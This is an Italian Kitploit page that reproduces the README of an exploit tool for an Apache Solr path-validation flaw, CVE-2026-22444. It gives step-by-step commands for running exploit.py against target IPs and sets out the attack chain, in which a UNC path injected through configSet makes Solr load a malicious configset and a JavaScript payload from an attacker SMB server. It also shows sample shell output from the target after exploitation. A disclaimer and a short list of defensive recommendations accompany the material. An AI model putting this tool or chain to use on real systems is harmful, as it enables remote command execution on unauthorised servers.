Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22444 — Exploit per Apache Solr CVE-2026-22444, che sfrutta l'iniezione di percorsi UNC e un server SMB per ottenere l'esecuzione remota di codice tramite un configset dannoso e un payload JavaScript. | Kitploit
Strumenti/GitHubGitHub/bfdfhdsfdd-crypto/cve-2026-22444
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubbfdfhdsfdd-crypto/cve-2026-22444

CVE-2026-22444

Exploit per Apache Solr CVE-2026-22444, che sfrutta l'iniezione di percorsi UNC e un server SMB per ottenere l'esecuzione remota di codice tramite un configset dannoso e un payload JavaScript.

Vedi Repository
547 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22444

Vulnerabilità di convalida del percorso UNC in Apache Solr

Panoramica

CVE-2026-22444 è una vulnerabilità di sicurezza che interessa Apache Solr, divulgata pubblicamente intorno al 20 gennaio 2026. La vulnerabilità deriva da una convalida insufficiente dell'input (CWE-20: Improper Input Validation) su alcuni parametri API dell'API "create core" di Apache Solr, consentendo a un attaccante di aggirare le regole di sicurezza quando Solr è in esecuzione in modalità "standalone", con possibile divulgazione di dati, esecuzione remota di codice (RCE) o divulgazione di hash NTLM.

Nello specifico, se Solr non ha l'autenticazione abilitata o se l'utente dispone dei permessi per creare core, un attaccante può abusare di questa API tramite richieste appositamente costruite per accedere a file protetti o eseguire operazioni dannose.

Informazioni sulla divulgazione

La vulnerabilità è stata scoperta e segnalata ad Apache nel 2025, ed è stata divulgata pubblicamente sulla mailing list oss-security:

Annuncio ufficiale: https://www.openwall.com/lists/oss-security/2026/01/20/5

Dettagli tecnici

La vulnerabilità risiede in CoreContainer.java, dove il costruttore CoreDescriptor attiva operazioni di rete prima di eseguire la convalida del percorso UNC:

  • instancePath.toAbsolutePath() può risolvere percorsi UNC tramite la rete
  • Il controllo Files.exists() esegue chiamate di rete
  • Files.newInputStream() esegue letture di rete
  • La convalida del percorso tramite assertPathAllowed() avviene solo dopo queste operazioni

Cronologia

  • 2025-08-20: Vulnerabilità scoperta e segnalata ad Apache
  • 2026-01-20: Divulgazione pubblica

Contenuto del repository

  • exploit.py - Script di exploit proof-of-concept
  • files/ - File di supporto necessari per l'exploit (configset)
    • rce.js - Payload JavaScript per l'esecuzione remota di codice
    • conf/ - File di configurazione Solr
      • solrconfig.xml - Definisce la catena di update processor dannosa
      • schema.xml - Definizione dello schema Solr
      • managed-schema - File dello schema gestito
  • requirements.txt - Dipendenze Python

Istruzioni per l'uso

Requisiti di ambiente

  • Python 3.6+
  • Il sistema target deve eseguire Apache Solr (sistema Windows, modalità standalone)
  • Il Solr target non deve avere l'autenticazione abilitata, oppure l'attaccante deve avere i permessi per creare core

Installazione delle dipendenze

root@kitploit:~
pip install -r requirements.txt

Le dipendenze includono:

  • requests>=2.25.0 - Per le richieste HTTP
  • impacket>=0.10.0 - Per creare il server SMB

Utilizzo di base

1. Attacco di base (rilevamento automatico dell'IP locale)

root@kitploit:~
python3 exploit.py <IP_target>

Esempio:

root@kitploit:~
python3 exploit.py 192.168.1.100

2. Specificare la porta di Solr

root@kitploit:~
python3 exploit.py <IP_target> --port <porta>

Esempio:

root@kitploit:~
python3 exploit.py 192.168.1.100 --port 8983

3. Specificare la configurazione del server SMB

root@kitploit:~
python3 exploit.py <IP_target> --smb-host <IP_server_SMB> --smb-port <porta_SMB>

Esempio:

root@kitploit:~
python3 exploit.py 192.168.1.100 --smb-host 192.168.1.50 --smb-port 445

4. Nome condivisione SMB personalizzato

root@kitploit:~
python3 exploit.py <IP_target> --share-name <nome_condivisione>

Esempio:

root@kitploit:~
python3 exploit.py 192.168.1.100 --share-name myshare

Descrizione dei parametri della riga di comando

root@kitploit:~
Posizionali:
  target_host           Indirizzo IP del server Solr target

Opzionali:
  -h, --help            Mostra il messaggio di aiuto ed esce
  --port, -p PORT       Porta del server Solr (predefinita: 8983)
  --smb-host SMB_HOST   IP del server SMB (predefinito: rilevamento automatico dell'IP locale)
  --smb-port SMB_PORT   Porta del server SMB (predefinita: 445)
  --share-name SHARE    Nome della condivisione SMB (predefinito: malicious)

Flusso dell'attacco

  1. Avvio del server SMB: lo script avvia un server SMB locale che condivide la directory files
  2. Creazione del core dannoso: invia una richiesta di creazione core al Solr target, puntando al configset dannoso sul server SMB
  3. Attivazione del payload: Solr scarica i file di configurazione dal server SMB, che contengono codice JavaScript dannoso
  4. Esecuzione dei comandi: inviando una richiesta di aggiornamento si attiva l'esecuzione del payload JavaScript
  5. Shell interattiva: dopo lo sfruttamento riuscito, si accede a un ambiente interattivo di esecuzione comandi

Utilizzo della shell interattiva

Dopo lo sfruttamento riuscito, lo script fornisce una shell interattiva:

root@kitploit:~
solr> whoami
[+] exit_code: 0, status: success
--- stdout ---
desktop-abc123\user

solr> dir
[+] exit_code: 0, status: success
--- stdout ---
Volume in drive C has no label.
...

solr> exit
[*] exiting shell...

Comandi supportati:

  • Qualsiasi comando CMD di Windows
  • exit o quit - Esce dalla shell interattiva
  • Ctrl+C - Interrompe ed esce

Principio di funzionamento

La vulnerabilità sfrutta la seguente catena tecnica:

  1. Iniezione di percorso UNC: iniezione di un percorso UNC tramite il parametro configSet (ad esempio //attacker-ip/share)
  2. Server SMB: ospita i file di configurazione Solr dannosi
  3. RCE JavaScript: sfrutta StatelessScriptUpdateProcessorFactory di Solr per eseguire codice JavaScript
  4. Esecuzione comandi: esegue comandi arbitrari sul sistema target tramite l'API Java Runtime

Esempi di utilizzo avanzato

Esempio con parametri completi

root@kitploit:~
python3 exploit.py 192.168.35.31 \
  --port 8983 \
  --smb-host 192.168.35.50 \
  --smb-port 445 \
  --share-name exploit

Descrizione della struttura dei file

root@kitploit:~
CVE-2026-22444/
├── exploit.py              # Script di exploit principale
├── requirements.txt        # Dipendenze Python
├── files/                  # Configset dannoso
│   ├── rce.js             # Payload JavaScript RCE
│   └── conf/              # Directory di configurazione Solr
│       ├── solrconfig.xml # Configura l'update processor dannoso
│       ├── schema.xml     # Definizione dello schema
│       └── managed-schema # Schema gestito
└── README.md              # Questo file

Descrizione del payload

rce.js: questo è il payload RCE principale, che:

  • Intercetta le operazioni di aggiornamento di Solr (add, delete, commit, rollback)
  • Recupera il parametro cmd dai parametri della richiesta
  • Esegue i comandi tramite l'API Java Runtime
  • Cattura stdout e stderr
  • Restituisce il risultato dell'esecuzione e il codice di uscita

solrconfig.xml: configura Solr per utilizzare la catena di update processor dannosa:

  • Definisce la catena di update processor rce-chain
  • Fa riferimento allo script rce.js
  • Imposta il request handler /update per utilizzare questa catena

Note importanti

⚠️ Avvertenza: questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. L'uso non autorizzato di questo strumento per attaccare sistemi è illegale.

  • Assicurarsi di ottenere un'autorizzazione scritta esplicita prima dell'uso
  • Utilizzare solo in ambienti di test o in ambienti con autorizzazione legittima
  • Non utilizzare su sistemi di produzione, se non in ambienti di penetration test controllati
  • L'utente è responsabile delle proprie azioni

Raccomandazioni di protezione

  1. Aggiornare Solr: aggiornare Apache Solr a una versione che corregga questa vulnerabilità
  2. Abilitare l'autenticazione: assicurarsi che Solr abbia un meccanismo di autenticazione forte abilitato
  3. Limitare i permessi di creazione core: concedere i permessi di creazione core solo a utenti fidati
  4. Isolamento di rete: distribuire Solr in un ambiente di rete protetto
  5. Regole firewall: limitare l'accesso all'interfaccia di amministrazione di Solr
  6. Monitoraggio delle attività anomale: monitorare l'accesso ai percorsi UNC e le richieste anomale di creazione core

Collegamenti di riferimento

  • Sito ufficiale Apache Solr
  • Annuncio sulla mailing list OSS Security
  • CWE-20: Improper Input Validation

Licenza

Questo progetto è concesso in licenza sotto la licenza MIT. Fare riferimento al file LICENSE per i dettagli.

Dichiarazione di esclusione di responsabilità

Questo strumento e le informazioni fornite sono destinati esclusivamente a scopi di ricerca sulla sicurezza e istruzione. L'autore non è responsabile per eventuali danni derivanti dall'uso improprio di queste informazioni o di questo strumento. L'utente deve rispettare tutte le leggi e i regolamenti applicabili e ottenere l'autorizzazione appropriata prima dell'uso.

Scarica lo strumento